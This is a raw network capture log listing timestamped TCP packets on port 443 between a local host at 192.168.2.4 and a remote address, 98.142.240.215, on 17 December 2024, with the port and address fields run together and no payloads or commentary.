                                                                                                                                                                              Dec 17, 2024 18:12:34.741975069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.742073059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.743423939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.743478060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.743484974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.743561029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.745762110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.745822906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.745832920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.745970964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.797561884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.797646999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.797662020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.797719955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.799824953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.799892902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.799901009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.799954891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.897737980 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.897944927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.897964954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.898150921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.910296917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.910401106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.910423994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.912522078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.912596941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.912611008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.913028002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.914841890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.914916992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.914926052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.917038918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.917177916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.917246103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.917252064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.918102980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.919501066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.919579029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.919589996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.919637918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.921785116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.921871901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.921885014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.922127962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.924088001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.924196959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.924211025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.924374104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.926418066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.926479101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.926486015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.926558971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.928772926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.928848028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.928853989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.929039955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.931040049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.931106091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.931112051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.931710005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.933367968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.933439016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.933445930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.933532953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.935722113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.935797930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.935805082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.936268091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.938019991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.938086987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.938092947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.938141108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.990274906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.990365028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.990387917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.990458012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.088399887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.088486910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.088500977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.088664055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.101259947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.101329088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.101341963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.101545095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.102576971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.102650881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.102658033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.102891922 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.105864048 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.105931044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.105940104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.105992079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.107254028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.107331038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.107337952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.107460976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.110297918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.110362053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.110368967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.110410929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.112667084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.112730980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.112737894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.112860918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.114267111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.114356041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.114362001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.114429951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.117357016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.117429018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.117438078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.117487907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.119625092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.119679928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.119687080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.119920969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.121932030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.121999025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.122006893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.122107029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.124711990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.124799967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.124809027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.124861002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.126574993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.126632929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.126640081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.126755953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.128922939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.128995895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.129003048 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.129239082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.180425882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.180509090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.180530071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.180572033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.182538986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.182605982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.182615042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.182763100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.280373096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.280462980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.280494928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.280541897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.292959929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.293059111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.293073893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.293185949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.295553923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.295629025 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.295636892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.295712948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.297700882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.297755003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.297770977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.297776937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.297815084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.300040007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.300211906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.300223112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.300313950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.302301884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.302388906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.302402020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.302692890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.304645061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.304708958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.304724932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.304761887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.306936026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.307008028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.307018042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.307248116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.309273005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.309317112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.309351921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.309357882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.309437037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.311614037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.311688900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.311697006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.311779022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.313958883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.314049959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.314057112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.314220905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.316440105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.316518068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.316526890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.316610098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.318639994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.318715096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.318722963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.318785906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.320996046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.321052074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.321060896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.321224928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.372509956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.372605085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.372639894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.372756004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.374634027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.374700069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.374708891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.374803066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.473706007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.473798037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.473830938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.473892927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.485058069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.485132933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.485146046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.485189915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.487112999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.487195015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.487202883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.487257957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.489741087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.489819050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.489830017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.489974976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.492089987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.492170095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.492178917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.492233992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.494611025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.494683027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.494694948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.494829893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.497025967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.497092009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.497102022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.497159958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.499053955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.499135971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.499145031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.499360085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.501389027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.501462936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.501471996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.501601934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.503724098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.503782988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.503791094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.503983974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.506043911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.506104946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.506112099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.506185055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.508395910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.508445024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.508452892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.508630037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.510687113 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.510787010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.510796070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.510912895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.513009071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.513068914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.513079882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.513122082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.570971966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.571049929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.571089983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.571192980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.573285103 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.573353052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.573360920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.573620081 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.666094065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.666174889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.666194916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.666306019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.678658962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.678728104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.678738117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.678842068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.681075096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.681140900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.681148052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.681200027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.683417082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.683481932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.683489084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.683557987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.685738087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.685806036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.685812950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.685888052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.688013077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.688082933 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.688091040 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.688149929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:35.690382957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:35.690444946 CET49731443192.168.2.498.142.240.215
